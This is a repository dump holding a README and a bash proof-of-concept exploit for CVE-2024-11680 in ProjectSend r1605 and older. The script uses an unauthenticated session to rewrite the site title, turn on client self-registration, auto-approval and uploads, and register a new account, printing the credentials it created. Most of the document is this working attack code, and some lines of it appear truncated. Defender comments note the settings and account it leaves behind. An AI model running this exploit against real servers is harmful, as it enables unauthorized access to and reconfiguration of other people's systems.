├── README.md └── exploit.sh /README.md: --------------------------------------------------------------------------------
# CVE-2024-11680 PoC Exploit
This repository contains a Proof of Concept (PoC) exploit for CVE-2024-11680, a critical vulnerability in ProjectSend r1605 and older versions. The exploit targets an improper authentication flaw caused by Privilege Misconfiguration issues.

![alt text](https://i.imgur.com/C2F7CFy.png)

---

## Features
- Exploits the improper authentication flaw to modify the application title; this step confirms the vulnerability.
- Enables insecure options (client registration, auto-approval, and file uploads).
- Registers a new user to demonstrate the privilege misconfiguration issues.
- Automatically restores the original application title after testing.

---

## Usage

### Prerequisites
1. A valid target running **ProjectSend** r1605 or earlier.
2. curl: this script uses curl to send HTTP requests.
   You can check whether curl is installed by running:

   ```command -v curl```

   If it is not installed, install it with your package manager. For example, on Ubuntu:

   ```sudo apt-get install curl```


### Running the Exploit
1. Clone this repository or download the script.
2. Run the exploit using the following syntax:
   ```./exploit -u TARGET_URL```
3. Check the output for the generated username and password of the registered user.

---

## Disclaimer
This exploit is intended for ethical testing within authorized environments, such as responsible disclosure programs or Vulnerability Disclosure Programs (VDPs). The authors are not responsible for misuse or unauthorized actions taken using this script.
40 | 41 | --- 42 | 43 | ## Author 44 | **D3N14LD15K** 45 | - d3n14ld15k[at]bugcrowdninja[dot]com 46 | -------------------------------------------------------------------------------- /exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Exploit: ProjectSend CSRF and Privilege Misconfiguration Exploit PoC 4 | # Description: This exploit is designed to test and confirm a Cross-Site Request Forgery (CSRF) vulnerability in ProjectSend by attempting to modify the host application's title. 5 | # If the vulnerability is present, the script proceeds to exploit privilege misconfigurations to enable insecure options (e.g., client registration, auto-approval, and file uploads) 6 | # and registers a new user with generated credentials. The exploit demonstrates potential impacts by chaining vulnerabilities that could lead to unauthorized actions and data exposure. 7 | # 8 | # Usage: 9 | # - Change the target URL using the `-u` flag to specify the vulnerable application. 10 | # - The script verifies the application's vulnerability by altering its title to "ProjectSendPoC." 11 | # - If the title modification is successful, it restores the original title after testing. 12 | # - It further registers a new user to highlight privilege misconfiguration issues. 13 | # 14 | # NOTE: You must use this exploit inside a folder with write permissions. 15 | # 16 | # Author: D3N14LD15K 17 | # Created: 2024-12-04 18 | # Updated: 2024-12-11 19 | # 20 | # Disclaimer: This script is intended for ethical hacking and educational purposes only. 21 | 22 | TARGET_URL="" 23 | CSRF_TOKEN="" 24 | USERNAME="user$(tr -dc A-Za-z0-9 &2 56 | exit 1 57 | ;; 58 | :) 59 | echo "Option -$OPTARG NOT SET" >&2 60 | exit 1 61 | ;; 62 | esac 63 | done 64 | 65 | if [[ -z "$TARGET_URL" ]]; then 66 | echo "[-] Target URL is required. Use the -u flag." 
# (closing lines of parse_args: the "-u was not given" error path; the function
# header and its getopts loop are earlier in the file)
    exit 1
  fi
}

#######################################
# Fetch index.php without logging in and extract the CSRF token and the
# current site title from the response.
# Globals:   TARGET_URL (read); RESPONSE, CSRF_TOKEN, ORIGINAL_TITLE (written)
# Outputs:   progress/error text to stdout
# Returns:   exits 1 if either value cannot be extracted
#
# Defender note: no login step is visible anywhere in this script. Every later
# POST reuses the cookie jar written here with -c, so the condition being tested
# is that the server accepts configuration and registration changes from a
# session that never authenticated. The cookie jar is a fixed file name in the
# current working directory (cookies.txt).
#######################################
function get_csrf_token_and_title {
  echo "[*] Starting vulnerability check on $TARGET_URL..."
  RESPONSE=$(curl -s -c cookies.txt "$TARGET_URL/index.php")
  CSRF_TOKEN=$(echo "$RESPONSE" | grep -oP 'name="csrf_token" value="\K[^"]+')
  # NOTE(review): this pattern looks truncated in this copy (the tag markup
  # around "»" appears to have been lost) -- compare with the original file.
  ORIGINAL_TITLE=$(echo "$RESPONSE" | grep -oP '.*?»\s+(.*?)' | sed -E 's/<[^>]*>//g' | sed -E 's/&.*?;//g')

  # The message only mentions the token, but an empty title takes this path too.
  if [[ -z "$CSRF_TOKEN" ]] || [[ -z "$ORIGINAL_TITLE" ]]; then
    echo "[-] Failed to retrieve CSRF token. Exploit failed"
    exit 1
  fi

}

#######################################
# POST a new site title to the "general" options section, reusing the
# unauthenticated session cookie and the token from get_csrf_token_and_title.
# Globals:   TARGET_URL, CSRF_TOKEN (read); RESPONSE (written)
# Arguments: $1 - title to set
# Returns:   exits 1 only when the response body contains
#            "Internal Server Error"; any other failure is not detected here
#            and is left for verify_title to catch
#
# Defender note: this is a real write to the target's configuration. The main
# workflow calls it a second time with ORIGINAL_TITLE to undo the change, but
# only after verify_title has succeeded.
#######################################
function update_title {
  local title=$1
  RESPONSE=$(curl -s -b cookies.txt -X POST "$TARGET_URL/options.php" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "csrf_token=$CSRF_TOKEN" \
    --data-urlencode "section=general" \
    --data-urlencode "this_install_title=$title")

  if echo "$RESPONSE" | grep -q "Internal Server Error"; then
    echo "[-] Exploit failed"
    exit 1
  fi
}

#######################################
# Re-fetch index.php and check whether the extracted title contains $1.
# Globals:   TARGET_URL (read); RESPONSE, CURRENT_TITLE (written)
# Arguments: $1 - expected title substring
# Outputs:   a coloured "vulnerable" line on success, a NOT VULNERABLE line
#            otherwise
# Returns:   exits 1 when the title does not contain the expected text
# Uses the same title-extraction pipeline as get_csrf_token_and_title, so the
# same truncation caveat applies to the pattern below.
#######################################
function verify_title {
  local expected_title=$1
  RESPONSE=$(curl -s -b cookies.txt "$TARGET_URL/index.php")
  CURRENT_TITLE=$(echo "$RESPONSE" | grep -oP '.*?»\s+(.*?)' | sed -E 's/<[^>]*>//g' | sed -E 's/&.*?;//g')


  # Substring match (glob), not equality: the extracted title may carry
  # surrounding text.
  if [[ "$CURRENT_TITLE" == *"$expected_title"* ]]; then
    echo -e "\e[32m[+] Target is vulnerable \e[0m"
  else
    echo "[-] Target NOT VULNERABLE"
    exit 1
  fi
}

# First things first. Insecure options must be enabled.
#######################################
# POST to the "clients" options section, turning on self-registration,
# auto-approval of new clients and client uploads.
# Globals:   TARGET_URL, CSRF_TOKEN (read); RESPONSE (written)
# Returns:   exits 1 when the response body contains "Internal Server Error"
#
# Defender note: unlike the title change, nothing in this script reverts these
# three settings, so they remain enabled on the target after a run. When
# assessing an instance, treat these flags being on as a possible sign that the
# flaw was exercised, and re-check them after any authorized test.
#######################################
function enable_insecure_options {
  echo -e "\e[90m[*] Enabling insecure options...\e[0m"
  RESPONSE=$(curl -s -b cookies.txt -X POST "$TARGET_URL/options.php" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "csrf_token=$CSRF_TOKEN" \
    --data-urlencode "section=clients" \
    --data-urlencode "clients_can_register=1" \
    --data-urlencode "clients_auto_approve=1" \
    --data-urlencode "clients_can_upload=1")


  if echo "$RESPONSE" | grep -q "Internal Server Error"; then
    echo "[-] Failed to enable insecure options"
    exit 1
  fi
}

#######################################
# Submit the client registration form with the generated credentials.
# Globals:   TARGET_URL, CSRF_TOKEN, USERNAME, PASSWORD, EMAIL (read);
#            RESPONSE (written); cookies.txt is also rewritten (-c)
# Outputs:   the new username and password on success (with ANSI colour codes)
# Returns:   exits 1 on an "alert-danger" response or on any response that
#            contains neither "alert-danger" nor "alert-success"
#
# Defender note: the account created here is never removed by the script, and
# the submitted profile fields are fixed strings (address "123 Fake Street",
# phone 1234567890), which is a useful thing to look for when auditing client
# accounts on an instance. The credentials are printed in clear on stdout.
#######################################
function register_user {
  echo -e "\e[90m[*] Registering a new user...\e[0m"

  #New user registration here
  RESPONSE=$(curl -s -b cookies.txt -c cookies.txt -L -X POST "$TARGET_URL/register.php" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "csrf_token=$CSRF_TOKEN" \
    --data-urlencode "name=$USERNAME" \
    --data-urlencode "username=$USERNAME" \
    --data-urlencode "password=$PASSWORD" \
    --data-urlencode "email=$EMAIL" \
    --data-urlencode "address=123 Fake Street" \
    --data-urlencode "phone=1234567890" \
    --data-urlencode "notify_upload=on")

  if echo "$RESPONSE" | grep -q "alert-danger"; then
    echo "[-] Registration failed: $(echo "$RESPONSE" | grep -oP 'alert-danger.*?>\K[^<]+')"
    exit 1
  elif echo "$RESPONSE" | grep -q "alert-success"; then
    echo -e "\e[32m[+] User registered successfully.\e[0m"
    echo -e "[+] New username: \e[96m$USERNAME\e[0m"
    echo -e "[+] New password: \e[96m$PASSWORD\e[0m"
    printf "\r\n"
    echo -e "\e[46m\e[30m[+]Try to log in with your new credentials.\e[0m"
    printf "\r\n"
  else
    echo "[-] Unexpected server response during registration"
    exit 1
  fi
}

# Main workflow. Order matters: the cookie jar and CSRF token obtained by
# get_csrf_token_and_title are reused by every later step, and the original
# title is restored before the insecure options and registration steps run.
parse_args "$@"
banner
get_csrf_token_and_title
update_title "$NEW_TITLE"
verify_title "$NEW_TITLE"
update_title "$ORIGINAL_TITLE"
enable_insecure_options
register_user

# Clean up
# Only reached on the success path: every early exit above leaves cookies.txt
# behind in the working directory.
rm -f cookies.txt
echo "[+] Exploit completed."
--------------------------------------------------------------------------------